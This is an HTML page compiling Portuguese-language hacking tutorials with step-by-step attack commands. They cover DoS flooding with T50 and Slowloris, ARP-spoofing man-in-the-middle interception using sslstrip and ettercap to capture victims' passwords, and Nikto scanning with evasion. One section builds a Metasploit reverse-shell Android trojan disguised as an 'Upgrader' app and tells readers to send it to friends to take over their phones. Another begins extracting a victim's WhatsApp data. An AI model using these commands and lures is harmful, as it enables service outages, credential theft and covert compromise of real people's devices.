<button class="btn widget uib_w_268 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="btn-gj"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_17_40">
<div class="tarea widget uib_w_269 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_269">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Vemos muitas pessoas que estão começando a estudar métodos hacking cometerem um erro bobo. Muitos sabem que alguns hackers são conhecidos por aplicar ataques DDoS em servidores e acabarem derrubando o site, impedindo que usuários
entrem no site atacado.</p>
<p>Mais recentemente tivemos o ataque a PSN (serviço da Sony) e a Live (serviço da Microsoft) aonde seus servidores foram atacados com uma ferramenta do grupo hacker chamado LizardSquad. Ataques DDoS são muito famosos pela
internet. Muitos querem saber como aplicar mas acabam se confundindo em dizer que fizeram ataque DDoS com ataques DoS. E você? Sabe a diferença sobre eles?</p>
<p> </p>
<p>Primeiro vamos começar explicando o que é <em>‘negação de serviço’</em> (Denial of Service. Mais conhecido como DoS). Um ataque de negação de serviço não é feito para roubar dados pessoais, ele consiste em sobrecarregar
o servidor de um site com o envio de muitos pacotes, fazendo assim, muitas requisições de uma só vez para o servidor. Quando o servidor é enxurrado por tantas requisições de uma só vez, ele acaba sobrecarregando e parando
de responder as outras requisições feitas. Isto impede de outros usuários se conectarem ao servidor e de ele responder a você. Imagine uma fila em que tem 50 pessoas para entrar em uma loja. Se todas essas 50 pessoas decidirem
entrar ao mesmo tempo por apenas 1 porta de entrada, iria causar um congestionamento e dificilmente todos entrariam. Mas vamos supor que mesmo demorando, todos eles consigam entrar. Agora, imagine 300 pessoas tentando entrar
ao mesmo tempo por aquela única porta de entrada. Difícil, né? E se acabasse chegando mais gente depois para entrar, elas não conseguiriam ser atendidas do lado de dentro pois nem conseguiriam chegar á porta. Devido a alta
demanda de pessoas querendo ser atendidas, ia chegar uma hora em que a loja não iria aceitar mais ninguém querendo entrar e acabaria parando de atender as outras pessoas que chegassem depois. É basicamente isso que acontece
quando se aplica um ataque de negação de serviço. Existem muito mais coisa envolvida nestes processos que ocorrem se a gente for estudar a fundo como funciona. Essa foi apenas uma analogia feita para que vocês pudessem
entender mais ou menos como funciona.</p>
<p>Agora vamos ás diferenças entre ataques DoS e DDoS.</p>
<h3>Ataques DDoS</h3>
<p>Os famosos ataques DDoS sempre tem um atacante, porém, não é ele que ataca. O atacante geralmente invade o computador de uma vítima e o torna “mestre” de vários outros computadores, que são chamados de “zumbis”. Esse ataque
geralmente é o mais efetivo na hora de derrubar um site, pois ele acaba tendo um maior “poder de fogo” na hora de atacar a vítima, fazendo milhões de requisições ao mesmo tempo. Isso seria como se tivessem milhões de pessoas
clicando no ícone de atualizar a página ou apertando a tecla F5 para recarregar a página em seus navegadores. Este tipo de ataque também é mais seguro para o atacante já que ele não vai atacar diretamente, ele vai enviar
comandos para os computadores mestres e esses computadores mestres vão falar para os computadores zumbis atacarem a vítima, escondendo assim, o real atacante por traz do congestionamento causado no servidor.</p>
</div>
</div>
<div class="widget uib_w_270" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://mestredossites.com.br/wp-content/uploads/2012/01/ataque-ddos.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_271 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_271">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Ataques DoS</p>
</div>
</div>
<div class="widget uib_w_272" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.vinagreasesino.com/imagenes/articulos/199/ataque-dos.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_273 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_273">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Por serem parecidos (este é o problema) muita gente confunde na hora de dizer que realizou um ataque de negação de serviço. Ataque DoS são realmente muito parecidos por terem a mesma finalidade e quase o mesmo nome. Então pessoas
leigas no assunto podem acabar dizendo de forma errada, o que é perfeitamente normal. Afinal, ninguém nasceu sabendo de tudo.</p>
<p>O método de ataque DoS é realizado por apenas uma pessoa, o atacante. Ele quem direciona o ataque a tal vítima com o objetivo de derrubar a mesma. Este tipo de ataque é bem fácil de ser prevenido com algumas regras no Firewall
pois não é tão complexo de se fazer o ataque e porque dependendo do servidor o atacante não irá conseguir derrubar a vítima. Essa é a principal diferença entre ataques DoS e DDoS.</p>
<p>É necessário também uma internet boa e um computador razoável para poder enviar muitos pacotes ao mesmo tempo para uma vítima.</p>
<p>Então da próxima vez que você fizer um ataque deste tipo, lembre-se de dizer o tipo correto do ataque que você fez.</p>
<h3>Como realizar ataques de negação de serviço</h3>
<p>Existem muitas ferramentas por aí em vários formatos de arquivos. A maioria são scripts feitos em linguagem Perl. Eu estou publicando aqui a mais nova versão do CannonBytes (0.9.1) que eu mesmo criei. Não é só para divulgar
mas também para mostrar como funciona um ataque de negação de serviço. Ela já foi testada e se usada as configurações corretas de ataque, você pode derrubar um servidor pequeno ou local. Esta versão inclui o uso de threads
(que é a possibilidade de usar mais de uma função ao mesmo tempo em Perl. Coisa que a linguagem em si não possui) e algumas outras coisinhas. Vale a pena dar uma olhada para saber como funciona um script DoS feito em Perl.</p>
<p>Lembrando que, ataque de negação de serviço é considerado crime aqui no Brasil e em outros países. O atacante estará sujeito as penalidades que lhe forem cabidas caso seja condenado. Ninguém do Ciência Hacker apoia o uso deste
tipo de ataques e nem nos responsabilizamos por eventuais ataques feitos por outras pessoas. Eu estou divulgando minha ferramenta para estudo. Conhecimento deve ser livre e de todos!</p>
<p>Link para Github –> GitHub
<br>Link para download no MEGA –> MEGA</p>
<h3>Como evitar ser atacado e/ou não ser “mestre” nem “zumbi”</h3>
<p>Existem muitos vírus que tornam seu computador “mestre” ou “zumbi”. Uma das maneiras corretas de se evitar isso é nunca baixando arquivos em sites não confiáveis e nunca baixando arquivos com nomes estranhos como: “MyPenis”
e “MyBalls”. Esses são nomes de alguns vírus que controlam seu computador para praticar este tipo de ataque.</p>
<p>Caso você ache que seu computador esteja sendo usado como cobaia para ataques, configure bem seu Firewall e use um bom antivírus.</p>
<p>Agora se você esta sendo vítima de ataques deste tipo, ligue para a empresa de seu provedor e solicite um IP novo e diga que você esta sofrendo ataques DoS ou DDoS que eles podem resolver seu problema, já que ataques deste
tipo são direcionados a IPs externos.</p>
<p>Espero que tenha ajudado a tirar dúvidas e a esclarecer como funcionam este tipo de ataque.
<br>Este foi meu primeiro post no site e estou sujeito a críticas construtivas.
<br>Deixem comentários e digam o que gostaram e o que deveria mudar no meu tipo de postagem.</p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="vinte_SETE">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_275" data-uib="layout/header" data-ver="0">
<h2>SEGURANÇA DA INFO.</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_276 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="btn_full"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_1_72">
<div class="tarea widget uib_w_283 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_283">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>O <em><strong>T50</strong></em> é uma forte ferramenta de ataque utilizado em redes que permite enviar milhares de pacotes por segundo, devido a sua flexibilidade de trabalhar com protocolos (HTTP, UDP, TCP, ARP,
entre outros). Dependendo da maneira que você o utiliza pode derrubar servidores, roteadores e diversos tipos de conexões entre dispositivos conectado a rede.
<br>Para quem precisa instalar segue a descrição dos seguintes comandos, caso já tenha instalado em sua distribuiação Linux pule para a fase 2.</p>
<p><strong>1. Instalação</strong>
</p>
<p>Podemos instalar manualmente ou utilizando o Organon.</p>
<p>Organon:</p>
<p><code>#organon -i t50</code>
</p>
<p>Manualmente:</p>
<p><code>#sudo -sH</code>
<br>
<code>#cd /opt</code>
<br>
<code>#git clone https://github.com/merces/t50.git</code>;
<br>
<code>#cd t50</code>
<br>
<code>#make </code>
<br>
<code>#make install</code>
<br>
<code>#cd /opt/t50</code>
</p>
<p><strong>2. Execução</strong>
</p>
<p>#./t50 IP –flood –turbo -S –turbo –dport 80</p>
<p><em>–dport</em>: Porta do alvo
<br>
<em>–protocol</em>: Protocolo que será utilizado
<br>
<em>IP</em>: Endereço do alvo
<br>Exemplo de outros comandos para ataque:</p>
<p>./t50 192.168.0.104 –flood –turbo –dport 80 -S -s TCP</p>
<p>./t50 192.168.0.104 –flood –turbo –dport 80 -S -s 10.10.0. TCP</p>
<p>O comando acima é mais refinado permite simular diversas conexões IPs realizarem o ataque, podendo causar certo travamento nas maiorias dos Antivirus.</p>
<p>Nota: Se tiver utilizando o Kali Linux já vem instalado por padrão, sendo assim o comando nao tem a necessidade de usar “./” ficando desse jeito: #t50 192.168.0.104 –flood –turbo –dport 80 -S -s 10.10.0. TCP</p>
</div>
</div>
<div class="tarea widget uib_w_277 d-margins" data-uib="media/text" data-ver="0" name="uib_w_277">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container"></div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="vinte_oito">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_284" data-uib="layout/header" data-ver="0">
<h2>DOS/DDOS</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_285 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="backtwo"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_56_56">
<div class="tarea widget uib_w_286 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_286">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>O <em><strong>Slowloris</strong></em> é uma poderosa ferramenta utilizada como ataque de negação de serviço, podendo derrubar ou deixar lento a conexão de um servidor devido a taxa de conexão emitida a um alvo.</p>
<p>Para que entenda seu funcionamento, ele age da seguinte maneira: Slowloris envia através de um processo multi-thread varias requisições parciais ao servidor Web alvo, que não são completadas. Servidores como o apache, mantém
por um determinado tempo as conexões TCP que ao sobrecarregar o servidor ele não valida todas essas requisições maliciosas ao mesmo tempo ficando em ciclo até sobrecarregar o servidor. A técnica atinge a camada 7 da aplicação
que refere ao modelo OSI, podendo acarretar num queda de conexão dos usuários com o servidor ou uma lentidão ao acessar as páginas do site.
<br>
<br>
</p>
<p><strong>Instalando e executando o Slowloris</strong>
</p>
<p>Abra o terminal e digite o seguinte comando para fazendo o download dele:</p>
<p>wget http://ha.ckers.org/slowloris/slowloris.pl</p>;
</div>
</div>
<div class="widget uib_w_287" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://cienciahacker.com.br/wp-content/uploads/2015/04/11.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_288 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_288">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>E agora comando para dar privilégio de acsso ao arquivo :</p>
<p>#chmod 777 slowloris.pl</p>
</div>
</div>
<div class="widget uib_w_289" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://cienciahacker.com.br/wp-content/uploads/2015/04/21.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_290 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_290">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Ou podemos usar um comandos mais rebuscado, setando as opções:</p>
<p># slowloris.pl -dns www.sitealvocom.br -port 80 -timeout 5 -num 5000 -cache</p>
<p><strong>–</strong><strong>dns</strong><strong> = Indica o </strong><strong>alvo, podendo ser um </strong><strong>IP </strong><strong>ou uma URL.</strong>
<br>
<strong>–</strong><strong>port</strong><strong> = Porta para o ataque.</strong>
<br>
<strong>-timeout = Tempo de espera entre cada </strong><strong>ataque</strong>
<br>
<strong>-num = Número de pacotes que serão enviado.</strong>
</p>
</div>
</div>
<div class="widget uib_w_291" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://cienciahacker.com.br/wp-content/uploads/2015/04/31.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_292 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_292">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Nota: Agora nota-se o tanto de pacote que são enviado para o servidor, alguns casos é possível derrubar um servidor apenas com uma 3G, porém para que tenha sucesso no ataque depende também se o alvo não tem o Modulo Anti_Apache
que corrige essa vulnerabilidade. No vídeo no começo do tutorial ensina a fazer todo o processo e como proteger seu servidor.</p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="VINTE_OITO">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_293" data-uib="layout/header" data-ver="0">
<h2>PENTEST</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_294 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="back_btng"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_14_80">
<div class="tarea widget uib_w_295 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_295">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Neste tutorial iremos abordar o tipo de ataque conhecido como Man in the Middle. Esse teste “envenena” a Tabela ARP da vítima, fazendo com que a máquina atacante – nossa máquina – se passe pelo roteador, fazendo com que consigamos
interceptar o tráfego e ter acesso a dados sigilosos trocados entre os dois atores.</p>
<p> </p>
<p>A exploração do ARP Poisoning é o método mais rápido de se estabelecer no meio da comunicação entre duas máquinas e interceptar as informações enviadas entre ambas, fazendo com que possua acesso a dados confidenciais, senhas
e relatórios de tráfego. Esse método se aplica somente em redes Ethernet ou seja, esse tipo de comunicação pode ser resumido em redes internas, sejam elas empresariais, residenciais ou até mesmo aquele wifi livre na praça
de alimentação do Shopping ou do café que você gosta de frequentar.</p>
<p> </p>
<p>1. Ambiente</p>
<p>Neste exemplo farão parte 3 atores:</p>
<p><strong>192.168.1.52</strong> – Máquina atacante com Debian 8 Jessie
<br>
<strong>192.168.1.57</strong> – Vítima com Windows 8.1, podendo ser qualquer outro sistema operacional, Windows, Linux ou OSX
<br>
<strong>192.168.1.1</strong> – Roteador como Gateway</p>
<p> </p>
<p>2. Preparando o ataque.</p>
<p>Neste exemplo, vamos precisar ficar com 3 terminais abertos.
<br>Abra o primeiro terminal. Agora vamos ativar o redirecionamento de pacotes.</p>
<p><code># echo 1 > /proc/sys/net/ipv4/ip_forward</code>
</p>
<p>Agora vamos efetuar todo o redirecionamento de pacotes que chegar na porta 80 da nossa máquina para a porta 7777</p>
<p><code># iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 7777</code>
</p>
<p> </p>
<p>Agora vamos ativar o Arpspoof para confundir a tabela ARP da vítima, a sintaxe é a seguinte:</p>
<p><code># arpspoof -i INTERFACE -t IP-DA-VITIMA IP-DO-GATEWAY</code>
</p>
<p>No nosso caso, como estou efetuando o ataque de uma interface Wireless a sintaxe ficaria</p>
<p><code># arpspoof -i wlan0 -t 192.168.1.57 192.168.1.1</code>
</p>
</div>
</div>
<div class="widget uib_w_296" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://cienciahacker.com.br/wp-content/uploads/2015/11/aaak.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_297 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_297">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Vamos deixar esse terminal aberto infectando a tabela ARP da vítima. Vamos abrir outro terminal e colocar o SSLSTRIP para escutar a porta 7777</p>
<p>Abra outro terminal e, como root, digite:</p>
<p><code># sslstrip -l 7777</code>
</p>
<p>Agora colocamos o sslstrip para entrar em modo listening e ouvir tudo que chegar na porta 7777
<br>Abra o terceiro terminal e, como root, digite:</p>
<p><code># ettercap -Tq -i wlan0</code>
</p>
<p>O ettercap é um poderoso sniffer de rede, é ele que vai nos mostrar tudo que passar pela placa wlan0 da nossa máquina. Agora a máquina da vítima está totalmente vigiada, e interceptaremos todos os pacotes que ela enviar para
o gateway.</p>
<p>Agora vamos aguardar o Host acessar algum site e preencher algum formulário. Lembrando que o Ettercap e o SSLStrip irá capturar tudo, não somente as senhas.</p>
</div>
</div>
<div class="widget uib_w_298" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://cienciahacker.com.br/wp-content/uploads/2015/11/sslstrip.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="trinta">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_306" data-uib="layout/header" data-ver="0">
<h2>PENTEST</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_307 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="backdoido"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_59_89">
<div class="tarea widget uib_w_308 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_308">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>O Nikto é uma ferramenta em Perl desenvolvida por Chris Solo e David Lodge, a qual foi escrita para validação de vulnerabilidade suportando diversas plataformas, entre elas Windows, Linux e UNIX. Ao contrário de alguns scanners
de segurança, o Nikto foi projetado para operar em um modo furtivo, mesmo assim ele causa um ruído como os demais scanners.</p>
<p> </p>
<p>Ele é um scanner open source licenciado pela GPL, dentro de sua funções ele busca vulnerabilidades em seu alvo permitindo verificar nos servidores itens de configuração, como arquivos de índice, opções de servidor
HTTP, identifica softwares instalados em servidores web e faz scan de itens e plugins que são frequentemente atualizados.</p>
<p>Instalando o Nikto</p>
<p>Caso não tenha em sua distro, baixe a ferramenta feita pela nossa equipe: o Organon e instale-o. Caso queira instalar manualmente, siga os procedimentos abaixo.</p>
<p>Faça download do pacote:</p>
<p><code># wget -cv http://www.cirt.net/nikto/nikto-2.1.5.tar.gz</code>;
</p>
<p>O Nikto não precisa de compilação, descompacte ele e entre na pasta.</p>
<p><code># tar -xvzf nikto-2.1.5.tar.gz</code>
</p>
<p><code># cd nikto-2.1.5/</code>
</p>
<p>Dê permissão para executar o arquivo.</p>
<p><code># chmod 777 nikto.pl</code>
</p>
<p>Atualize a ferramenta para a versão mais recente caso tenha disponível.</p>
<p><code># ./nikto.pl -update</code>
</p>
<h2>Realizando teste com Nikto</h2>
<p>Antes de iniciar o <em>scanning</em> com a ferramenta, precisamos conhecer as informações de configurações que tem disponível na ferramenta para auxiliar melhor o entendimento dela. Para ver as suas opções digite
o comando de ajuda, listado logo abaixo.</p>
<p><code># ./nikto -h</code>
</p>
</div>
</div>
<div class="widget uib_w_309" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://cienciahacker.com.br/wp-content/uploads/2015/09/nikto-1024x576.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_310 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_310">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Iremos fazer algumas demonstrações específicas para realizar scans num determinado alvo:</p>
<p><code># ./nikto.pl -host http://testphp.vulnweb.com/ -p 80,443 -o relatorio.txt</code>
</p>
<p>Onde:</p>
<p><strong>-host:</strong> endereço da vítima (IP ou DNS), nesse caso pegaremos um site próprio para teste.
<br>
<strong>-p: </strong>porta para efetuar o scan, de preferência faça scan antes para ver as portas que estão rodando serviços web.
<br>
<strong>-o: </strong>saída do arquivo (log do scan).</p>
<p>Podemos fazer uma análise mais profunda no site.</p>
<p><code># ./nikto.pl -C all -host http://testphp.vulnweb.com/ -p 80,443 -mutate 1,2,3,4 -evasion 1,2 -o relatorio.txt</code>
</p>
<p>Onde:</p>
<p><strong>-mutate 1,2,3,4:</strong> busca por diretório através de tentativas exaustivas (causa bastante ruído).
<br>
<strong>-evasion 1,2: </strong>faz scan fica mais furtivo, burlando alguns tipos firewall e IPS.
<br>
<strong>-C all:</strong> força a checagem de todos os diretórios em busca de CGI.</p>
</div>
</div>
<div class="widget uib_w_311" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://cienciahacker.com.br/wp-content/uploads/2015/11/Captura-de-tela-de-2015-11-05-151751-e1446743965942-1024x434.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_312 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_312">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Como sempre, se recomenda a utilização de proxy para fazer scan, para caso ele bloqueie você não fique impossibilitado de continuar fazendo no seu IP outros tipos de varredura. A opção <strong>-useproxy </strong>permite
você adicionar um, como exemplo o privoxy ou TOR.</p>
<p><code># ./nikto.pl -C all -host http://testphp.vulnweb.com/ -p 80,443 -mutate 1,2,3,4 -evasion 1,2 -o relatorio.txt -useproxy 127.0.0.1</code>
</p>
<p>Fomos incrementando aos poucos os comandos para que você entenda como refinar o scan, lembrando que é de extrema importância que você leia a documentação dele para aprender como usar outras configurações de scan.</p>
<p>As vulnerabilidades e avisos listados no arquivo que é gerado pelo scan (log) são catalogadas de acordo com o banco de dados OSVDB, que pode ser acessado aqui e poderá encontrar sobre os detalhes de cada vulnerabilidade citada
pelo Nikto, e explorá-las.</p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="trinta_um">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_313" data-uib="layout/header" data-ver="0">
<h2>PENTEST</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_314 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="veii"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_20_15">
<div class="tarea widget uib_w_315 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_315">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>
<br>Post:. Este é um tutorial explicando como hackear telefones Android com Kali
<br>Eu não consigo ver qualquer tutoriais explicando este hack / Exploit, por isso, eu fiz um.
<br>(Ainda
<em>assim, </em><em>você já deve saber sobre </em>este)</p>
<p>Passo 1: Fogo-Up Kali:</p>
<p>Abra um terminal, e fazer um <strong>Trojan</strong> .apk</p>
<p>Você pode fazer isso digitando:</p>
<p><strong>msfpayload android / meterpreter / reverse_tcp LHOST = 192.168.0.4 R> /root/Upgrader.apk</strong> (substitua LHOST com seu próprio IP)</p>
<p>Você também pode cortar android em <strong>WAN ou seja, através Interet </strong>usando sua <strong>Pública / IP externo</strong> no LHOST e pelo <strong>encaminhamento de porta</strong>
</p>
</div>
</div>
<div class="widget uib_w_316" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/50/87/63559111534592/0/hack-android-using-kali-remotely.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_317 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_317">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Passo 2: Abra Outro Terminal:</p>
<p>Abra outro terminal até que o arquivo está sendo produzido.</p>
<p>Carregue console metasploit, digitando: <strong>msfconsole</strong>
</p>
</div>
</div>
<div class="widget uib_w_318" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/07/55/63559118196327/0/hack-android-using-kali-remotely.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_319 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_319">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Passo 3: Set-Up um ouvinte:</p>
<p>Depois de carregar (isso vai levar tempo), carregue o multi-manipulador explorar digitando: <strong>use exploit/multi/handler</strong>
</p>
</div>
</div>
<div class="widget uib_w_320" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/11/33/63559118285983/0/hack-android-using-kali-remotely.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_321 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_321">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Passo 4: Exploit!</p>
<p>No último tipo: <strong>explorar</strong> para iniciar o ouvinte.</p>
<p>Copie o aplicativo que você fez (Upgrader.apk) a partir da pasta de raiz, para que você telefone android.
<br>
<br>
</p>
<p>Em seguida, enviá-lo usando o upload para Dropbox ou qualquer site de compartilhamento (como: www.speedyshare.com).</p>
<p>Em seguida, enviar o link que o site deu-lhe a seus amigos e explorar seus telefones (Somente em LAN, mas se você usou o método WAN então você pode usar o exploit em qualquer lugar na Internet)
<br>
<br>
</p>
<ul>
<li>Deixe a vítima instalar o app Upgrader (como ele poderia pensar que se destina a melhorar algumas características em seu telefone)</li>
<li><strong>No </strong>entanto, a opção de subsídio para a instalação de aplicativos defontes desconhecidas deve ser <strong>ativado</strong> (se não) a partir das definições do telefone android de
segurança para permitir que o cavalo de Tróia para instalar.</li>
<li>E quando ele clica Open ...</li>
</ul>
<p>Passo 5: BOOM!</p>
<p>Lá vem o prompt meterpreter:</p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="VINTE_NOVE">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_328" data-uib="layout/header" data-ver="0">
<h2>ANDROID</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_329 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="backtyo"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_56_79">
<div class="tarea widget uib_w_330 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_330">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Bem-vindo ao meu nono posto, este tutorial irá explicar como extrair e decodificar dados WhatsApp do sistema android da vítima.</p>
<p>Sim, o dispositivo <strong>deverá ser </strong>erradicado, não há nenhuma maneira em torno de fazer isso remotamente. Fui ficando PM de sobre isso e não pode simplesmente responder com a palavra SPOOF.</p>
<h2>O WhatsApp?</h2>
<p>Quase todo mundo sabe sobre isso. É uma aplicação social android, que é permite que o usuário envie mensagens gratuitas através da Internet em poucos segundos. Os desenvolvedores fizeram enorme sucesso e tem alto
nível e algoritmos complexos para criptografar e armazenar os dados, o que muda a cada atualização! E, portanto, todo mundo usa-lo para enviar mensagens de até mesmo o mais pessoal, porque eles sabem que é seguro.</p>
<p><strong>Mas é?</strong>
</p>
<p>Sim é realmente muito seguro, no entanto, se a vítima é um tolo ou crédulos, ele / ela é a principal vulnerabilidade aqui. Eu vejo muitos de raiz o seu android para explorar / de pressão para limites máximos do sistema
dos usuários experientes ". Seguindo os passos dos usuários inexperientes 'também root / tijolo seu android apenas para realizar uma tarefa menor.Eles nem sequer se preocupam com os Contras.</p>
<p>De qualquer forma, vamos executar o hack:</p>
<p>Passo 1: Exploit e ter acesso ao Android!</p>
<p>Esta a parte mais fácil que todos vocês gostam e são usados para.</p>
<p>Siga este guia para ter acesso ao Android Enraizado.</p>
</div>
</div>
<div class="widget uib_w_331" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/91/20/63579520271697/0/hack-and-decrypt-whatsapp-database-remotely-root.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="widget uib_w_332" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/66/24/63579520464041/0/hack-and-decrypt-whatsapp-database-remotely-root.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
